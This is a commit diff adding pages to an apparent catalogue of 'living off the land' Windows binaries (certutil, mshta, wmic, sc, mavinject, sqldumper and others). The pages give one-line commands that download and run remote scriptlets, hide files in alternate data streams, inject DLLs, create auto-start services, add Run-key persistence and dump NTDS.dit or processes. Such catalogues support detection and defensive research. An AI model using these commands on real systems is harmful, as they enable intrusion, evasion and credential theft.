Added some more LOLBins

Contribute.md

@@ -20,6 +20,7 @@ Resources:
 Full path:
 ```
 c:\windows\system32\binary.exe
+c:\windows\sysWOW64\binary.exe
 ```
 
 Notes:

LOLBins.md

@@ -6,26 +6,42 @@ If you are missing from the acknowledgement, please let me know (I did not forge
 # OS BINARIES
    
 [Atbroker.exe](OSBinaries/Atbroker.md)    
+[Bash.exe](OSBinaries/Bash.md)    
+[Certutil.exe](OSBinaries/Certutil.md)    
 [Cmstp.exe](OSBinaries/Cmstp.md)     
 [Control.exe](OSBinaries/Control.md)     
+[Cscript.exe](OSBinaries/Cscript.md)    
 [Dfsvc.exe](OSBinaries/Dfsvc.md)     
+[Diskshadow.exe](OSBinaries/Diskshadow.md)     
+[Extrac32.exe](OSBinaries/Extrac32.md)     
+[Expand.exe](OSBinaries/Expand.md)     
+[Findstr.exe](OSBinaries/Findstr.md)     
 [Forfiles.exe](OSBinaries/Forfiles.md)    
+[Hh.exe](OSBinaries/Hh.md)    
 [Ieexec.exe](OSBinaries/Ieexec.md)     
 [Ie4unit.exe](OSBinaries/Ie4unit.md)     
 [Infdefaultinstall.exe](OSBinaries/Infdefaultinstall.md)    
 [Installutil.exe](OSBinaries/Installutil.md)      
+[Makecab.exe](OSBinaries/Makecab.md)      
 [Mavinject.exe](OSBinaries/Mavinject.md)       
 [Msbuild.exe](OSBinaries/Msbuild.md)    
 [Msdt.exe](OSBinaries/Msdt.md)     
 [Mshta.exe](OSBinaries/Mshta.md)     
 [Msiexec.exe](OSBinaries/Msiexec.md)    
 [Odbcconf.exe](OSBinaries/Odbcconf.md)     
+[Pcalua.exe](OSBinaries/Pcalua.md)     
+[Powershell.exe](OSBinaries/Powershell.md)     
 [Presentationhost.exe](OSBinaries/Presentationhost.md)     
+[Print.exe](OSBinaries/Print.md)     
+[Reg.exe](OSBinaries/Reg.md)    
+[Regedit.exe](OSBinaries/Regedit.md)    
 [Regasm.exe](OSBinaries/Regasm.md)    
 [Regsvcs.exe](OSBinaries/Regsvcs.md)    
 [Regsvr32.exe](OSBinaries/Regsvr32.md)   
 [Rundll32.exe](OSBinaries/Rundll32.md)   
 [Runscripthelper.exe](OSBinaries/Runscripthelper.md)     
+[Sc.exe](OSBinaries/Sc.md)     
+[Scriptrunner.exe](OSBinaries/Scriptrunner.md)     
 [Syncappvpublishingserver.exe](OSBinaries/Syncappvpublishingserver.md)     
 [Wmic.exe](OSBinaries/Wmic.md)     
 [Xwizard.exe](OSBinaries/Xwizard.md)     
@@ -34,18 +50,23 @@ If you are missing from the acknowledgement, please let me know (I did not forge
    
 # OTHER MICROSOFT SIGNED BINARIES
    
+[Appvlp.exe](OtherMSBinaries/Appvlp.md)    
 [Bginfo.exe](OtherMSBinaries/Bginfo.md)    
 [Cdb.exe](OtherMSBinaries/Cdb.md)    
 [Csi.exe](OtherMSBinaries/Csi.md)    
 [Dnx.exe](OtherMSBinaries/Dnx.md)    
 [Msxsl.exe](OtherMSBinaries/Msxsl.md)    
 [Rcsi.exe](OtherMSBinaries/Rcsi.md)     
+[Sqldumper.exe](OtherMSBinaries/Sqldumper.md)     
+[Sqlps.exe](OtherMSBinaries/Sqlps.md)     
 [Te.exe](OtherMSBinaries/Te.md)     
 [Tracker.exe](OtherMSBinaries/Tracker.md)     
 [Winword.exe](OtherMSBinaries/Winword.md)    
 
 
-
+# OTHER NON MICROSOFT BINARIES
+[Nvuhda6.exe](OtherBinaries/Nvuhda6.md)     
+    
  
 
 

OSBinaries/Bash.md

@@ -0,0 +1,27 @@
+## Bash.exe
+
+* Functions: Execute
+
+```
+bash.exe -c calc.exe
+```
+
+Acknowledgements:
+* ?
+
+Code sample:
+* 
+
+Resources:
+* 
+
+Full path:
+```
+?
+```
+
+Notes:
+
+
+
+ 

OSBinaries/Certutil.md

@@ -0,0 +1,36 @@
+## Certutil.exe
+
+* Functions: Download, Add ADS, Decode, Encode
+
+```
+certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe    
+    
+certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt    
+    
+certutil -encode inputFileName encodedOutputFileName   
+    
+certutil -decode encodedInputFileName decodedOutputFileName
+```
+
+Acknowledgements:
+* Matt Graeber - @mattifestation
+* Moriarty - @Moriarty2016
+
+Code sample:
+* 
+
+Resources:
+* https://twitter.com/Moriarty_Meng/status/984380793383370752
+* https://twitter.com/mattifestation/status/620107926288515072
+
+Full path:
+```
+c:\windows\system32\certutil.exe
+c:\windows\sysWOW64\certutil.exe
+```
+
+Notes:
+
+
+
+ 

OSBinaries/Cscript.md

@@ -0,0 +1,29 @@
+## Cscript.exe
+
+* Functions: Execute, Read ADS
+
+```
+cscript c:\ads\file.txt:script.vbs
+```
+
+Acknowledgements:
+* Oddvar Moe - @oddvarmoe
+
+Code sample:
+* 
+
+Resources:
+* https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
+* https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
+
+Full path:
+```
+c:\windows\system32\cscript.exe
+c:\windows\sysWOW64\cscript.exe
+```
+
+Notes:
+
+
+
+ 

OSBinaries/Diskshadow.md

@@ -0,0 +1,30 @@
+## Diskshadow.exe
+
+* Functions: Execute, Dump NTDS.dit
+
+```
+diskshadow.exe /s c:\test\diskshadow.txt   
+
+diskshadow> exec calc.exe    
+```
+
+Acknowledgements:
+* Jimmy - @bohops
+
+Code sample:
+*
+
+Resources:
+* https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
+
+Full path:
+```
+c:\windows\system32\diskshadow.exe
+c:\windows\sysWOW64\diskshadow.exe
+```
+
+Notes:
+Only present on Windows Server OS 2008 and newer
+
+
+ 

OSBinaries/Expand.md

@@ -0,0 +1,34 @@
+## Expand.exe
+
+* Functions: Download, Copy, Add ADS
+
+```
+expand \\webdav\folder\file.bat c:\ADS\file.bat    
+
+expand c:\ADS\file1.bat c:\ADS\file2.bat    
+
+expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat     
+```
+
+Acknowledgements:
+* Rahmat Nurfauzi - @infosecn1nja
+* Oddvar Moe - @oddvarmoe
+
+Code sample:
+* [NameOfLink](Payload/NameOfPayload)
+
+Resources:
+* https://twitter.com/infosecn1nja/status/986628482858807297
+* https://twitter.com/Oddvarmoe/status/986709068759949319
+
+Full path:
+```
+c:\windows\system32\Expand.exe
+c:\windows\sysWOW64\Expand.exe
+```
+
+Notes:
+
+
+
+ 

OSBinaries/Extrac32.md

@@ -0,0 +1,31 @@
+## Extrac32.exe
+
+* Functions: Add ADS
+
+```
+extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe    
+
+extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe    
+```
+
+Acknowledgements:
+* Oddvar Moe - @oddvarmoe
+
+Code sample:
+* 
+
+Resources:
+* https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
+* https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
+
+Full path:
+```
+c:\windows\system32\extrac32.exe
+c:\windows\sysWOW64\extrac32.exe
+```
+
+Notes:
+
+
+
+ 

OSBinaries/Findstr.md

@@ -0,0 +1,31 @@
+## Findstr.exe
+
+* Functions: Add ADS
+
+```
+findstr /V /L W3AllLov3DonaldTrump c:\ADS\file.exe > c:\ADS\file.txt:file.exe    
+
+findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe    
+```
+
+Acknowledgements:
+* Oddvar Moe - @oddvarmoe
+
+Code sample:
+* 
+
+Resources:
+* https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
+* https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
+
+Full path:
+```
+c:\windows\system32\findstr.exe
+c:\windows\sysWOW64\findstr.exe
+```
+
+Notes:
+Some specific details about the binary file.
+
+
+ 

OSBinaries/Forfiles.md

@@ -3,7 +3,8 @@
 * Functions: Execute, Read ADS
 
 ```
-forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe    
+forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe     
+
 forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe"    
 ```
 

OSBinaries/Hh.md

@@ -0,0 +1,30 @@
+## hh.exe
+
+* Functions: Open Explorer
+
+```
+HH.exe http://www.google.com      
+
+HH.exe C:\    
+```
+
+Acknowledgements:
+* Oddvar Moe - @oddvarmoe
+
+Code sample:
+* 
+
+Resources:
+* https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/
+
+Full path:
+```
+c:\windows\system32\hh.exe
+c:\windows\sysWOW64\hh.exe
+```
+
+Notes:
+
+
+
+ 

OSBinaries/Makecab.md

@@ -0,0 +1,32 @@
+## Makecab.exe
+
+* Functions: Package, Add ADS, Download
+
+```
+makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab    
+
+makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab    
+   
+makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab
+```
+
+Acknowledgements:
+* Oddvar Moe - @oddvarmoe
+
+Code sample:
+* 
+
+Resources:
+* https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
+
+Full path:
+```
+c:\windows\system32\makecab.exe
+c:\windows\sysWOW64\makecab.exe
+```
+
+Notes:
+
+
+
+ 

OSBinaries/Mavinject.md

@@ -1,23 +1,28 @@
 ## Mavinject.exe
 
-* Functions: Execute
+* Functions: Execute, Read ADS
 
 ```
 MavInject.exe <PID> /INJECTRUNNING <PATH DLL>
 
-MavInject.exe 3110 /INJECTRUNNING c:\folder\evil.dll>
+MavInject.exe 3110 /INJECTRUNNING c:\folder\evil.dll     
+   
+mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll"
 ```
 
 Acknowledgements:
 * Giuseppe N3mes1s - @gN3mes1s
 * Adam - @hexacorn
+* Oddvar Moe - @oddvarmoe
    
 Code sample:
 * 
 
 Resources:
 * https://twitter.com/gN3mes1s/status/941315826107510784     
-* https://twitter.com/Hexacorn/status/776122138063409152     
+* https://twitter.com/Hexcorn/status/776122138063409152     
+* https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
+
 
 Full path:
 ```

OSBinaries/Mshta.md

@@ -1,17 +1,20 @@
 ## mshta.exe
 
-* Functions: Execute
+* Functions: Execute, Read ADS
 
 ```
 mshta.exe evilfile.hta    
 
 mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))    
 
-mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct").Exec();close();
+mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct").Exec();close();     
+    
+mshta "C:\ads\file.txt:file.hta"
 ```
 
 Acknowledgements:
 * Casey Smith - @subtee
+* Oddvar Moe - @oddvarmoe
 
 Code sample:
 * [Mshta_calc.sct](Payload/Mshta_calc.sct)
@@ -21,6 +24,7 @@ Resources:
 * https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4     
 * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct     
 * https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/    
+* https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
 
 Full path:
 ```

OSBinaries/Pcalua.md

@@ -0,0 +1,32 @@
+## Pcalua.exe
+
+* Functions: Execute
+
+```
+pcalua.exe -a calc.exe    
+
+pcalua.exe -a \\server\payload.dll    
+
+pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java     
+```
+
+Acknowledgements:
+* fab - @0rbz_    
+* Kyle Hanslovan - @KyleHanslovan
+
+Code sample:
+* 
+
+Resources:
+* https://twitter.com/KyleHanslovan/status/912659279806640128
+
+Full path:
+```
+c:\windows\system32\pcalua.exe
+```
+
+Notes:
+
+
+
+ 

OSBinaries/Powershell.md

@@ -0,0 +1,29 @@
+## Powershell.exe
+
+* Functions: Execute, Read ADS
+
+```
+powershell -ep bypass - < c:\temp:ttt    
+
+```
+
+Acknowledgements:
+* Moriarty - @Moriarty_Meng
+
+Code sample:
+* [NameOfLink](Payload/NameOfPayload)
+
+Resources:
+* https://twitter.com/Moriarty_Meng/status/984380793383370752
+
+Full path:
+```
+C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
+C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+```
+
+Notes:
+Needs some more examples.... A looooooot can be done with Powershell. It is like the top of the LOLBin chain.... :-)
+
+
+ 

OSBinaries/Print.md

@@ -0,0 +1,33 @@
+## Print.exe
+
+* Functions: Download, Copy, Add ADS
+
+```
+print /D:c:\ads\file.txt:file.exe c:\ads\file.exe     
+     
+print /D:C:\ads\CopyOfFile.exe C:\ads\FileToCopy.exe
+
+print /D:c:\outfolder\outfile.exe \\webdavserver\folder\file.exe     
+```
+
+Acknowledgements:
+* Oddvar Moe - @oddvarmoe
+
+Code sample:
+*
+
+Resources:
+* https://twitter.com/Oddvarmoe/status/985518877076541440
+* https://www.youtube.com/watch?v=nPBcSP8M7KE&lc=z22fg1cbdkabdf3x404t1aokgwd2zxasf2j3rbozrswnrk0h00410
+
+Full path:
+```
+c:\windows\system32\print.exe
+c:\windows\sysWOW64\print.exe
+```
+
+Notes:
+
+
+
+ 

OSBinaries/Reg.md

@@ -0,0 +1,28 @@
+## reg.exe
+
+* Functions: Export Reg, Add ADS, Import Reg
+
+```
+reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
+```
+
+Acknowledgements:
+* Oddvar Moe - @oddvarmoe
+
+Code sample:
+* 
+
+Resources:
+* https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
+
+Full path:
+```
+c:\windows\system32\reg.exe
+c:\windows\sysWOW64\reg.exe
+```
+
+Notes:
+
+
+
+ 

OSBinaries/Rundll32.md

@@ -1,6 +1,6 @@
 ## Rundll32.exe
 
-* Functions: Execute
+* Functions: Execute, Read ADS
 
 ```
 rundll32.exe AllTheThingsx64,EntryPoint    
@@ -31,7 +31,9 @@ rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url"
 
 rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url"
 
-rundll32.exe ieadvpack.dll,LaunchINFSection test.inf,,1,
+rundll32.exe ieadvpack.dll,LaunchINFSection test.inf,,1,   
+     
+rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain   
 ```
   
 Acknowledgements:
@@ -39,6 +41,7 @@ Acknowledgements:
 * Jimmy - @bohops
 * Moriarty - @Moriarty_Meng
 * Adam - @hexacorn
+* Oddvar Moe - @oddvarmoe
 
 Code sample:
 * [AllTheThingsx64.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx64.dll)[1]     
@@ -49,6 +52,7 @@ Resources:
 * https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7
 * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Rundll32.md
 * https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
+* https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
 
 Full path:
 ```

OSBinaries/Sc.md

@@ -0,0 +1,30 @@
+## SC.exe
+
+* Functions: Execute, Read ADS, Create Service, Start Service
+
+```
+sc create evilservice binPath= "\"c:\ADS\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto     
+sc start evilservice     
+
+```
+
+Acknowledgements:
+* Oddvar Moe - @oddvarmoe
+
+Code sample:
+* 
+
+Resources:
+* https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
+
+Full path:
+```
+c:\windows\system32\sc.exe
+c:\windows\sysWOW64\sc.exe
+```
+
+Notes:
+
+
+
+ 

OSBinaries/Scriptrunner.md

@@ -0,0 +1,26 @@
+## Scriptrunner.exe
+
+* Functions: Execute
+
+```
+Scriptrunner.exe -appvscript calc.exe
+```
+
+Acknowledgements:
+* Nick Tyrer - @NickTyrer
+
+Code sample:
+* 
+
+Resources:
+* https://twitter.com/KyleHanslovan/status/914800377580503040
+* https://twitter.com/NickTyrer/status/914234924655312896
+
+Full path:
+```
+c:\windows\system32\scriptrunner.exe
+c:\windows\sysWOW64\scriptrunner.exe
+```
+
+Notes:
+ 

OSBinaries/Wmic.md

@@ -25,7 +25,7 @@ wmic /node:REMOTECOMPUTERNAME PROCESS call create "at 9:00PM c:\GoogleUpdate.exe
     
 wmic /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit"    
      
-wmic process get brief /format:"https://www.example.com/file.xsl"    
+wmic process get brief /format:"https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl"    
      
 wmic os get /format:"MYXSLFILE.xsl"    
      

OSBinaries/regedit.md

@@ -0,0 +1,30 @@
+## regedit.exe
+
+* Functions: Write ADS, Read ADS, Import registry
+
+```
+regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
+    
+regedit c:\ads\file.txt:regfile.reg   
+```
+
+Acknowledgements:
+* Oddvar Moe - @oddvarmoe
+
+Code sample:
+* 
+
+Resources:
+* https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
+
+Full path:
+```
+c:\windows\system32\regedit.exe
+c:\windows\sysWOW64\regedit.exe
+```
+
+Notes:
+
+
+
+ 

OtherBinaries/Nvuhda6.md

@@ -0,0 +1,37 @@
+## Nvuhda6.exe
+
+* Functions: Execute, Copy, Add registry, Create shortcut, kill process
+
+```
+nvuhda6.exe System calc.exe    
+    
+nvuhda6.exe Copy test.txt,test-2.txt     
+    
+nvuhda6.exe SetReg HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\malware=malware.exe     
+    
+nvuhda6.exe CreateShortcut test.lnk,"Test","c:\windows\system32\calc.exe","","c:\windows\system32"     
+    
+nvuhda6.exe KillApp calculator.exe     
+   
+nvuhda6.exe Run foo    
+```
+
+Acknowledgements:
+* Adam - @hexacorn
+
+Code sample:
+* 
+
+Resources:
+* http://www.hexacorn.com/blog/2017/11/10/reusigned-binaries-living-off-the-signed-land/
+
+Full path:
+```
+?
+```
+
+Notes:
+
+
+
+ 

OtherMSBinaries/Appvlp.md

@@ -0,0 +1,29 @@
+## Appvlp.exe
+
+* Functions: Execute
+
+```
+AppVLP.exe calc.exe    
+AppVLP.exe \\webdav\calc.bat   
+```
+
+Acknowledgements:
+* fab - @0rbz_    
+
+Code sample:
+*
+
+Resources:
+* 
+
+Full path:
+```
+C:\Program Files\Microsoft Office\root\client\appvlp.exe       
+C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe       
+```
+
+Notes:
+Requires Office.
+
+
+ 

OtherMSBinaries/Sqldumper.md

@@ -0,0 +1,31 @@
+## Sqldumper.exe
+
+* Functions: Dump process
+
+```
+sqldumper.exe 464 0 0x0110:40    
+
+sqldumper.exe 540 0 0x01100    
+```
+
+Acknowledgements:
+* Luis Rocha - @countuponsec
+
+Code sample:
+*
+
+Resources:
+* https://twitter.com/countuponsec/status/910969424215232518
+* https://twitter.com/countuponsec/status/910977826853068800
+* https://support.microsoft.com/en-us/help/917825/how-to-use-the-sqldumper-exe-utility-to-generate-a-dump-file-in-sql-se
+
+Full path:
+```
+C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe
+```
+
+Notes:
+
+
+
+ 

OtherMSBinaries/Sqlps.md

@@ -0,0 +1,27 @@
+## Sqlps.exe
+
+* Functions: Execute, evade logging
+
+```
+Sqlps.exe -noprofile
+```
+
+Acknowledgements:
+* Bryon - @bryon_
+
+Code sample:
+*
+
+Resources:
+* https://twitter.com/bryon_/status/975835709587075072
+
+Full path:
+```
+C:\Program files (x86\Microsoft SQL Server\100\Tools\Binn\sqlps.exe
+```
+
+Notes:
+A Powershell host.
+
+
+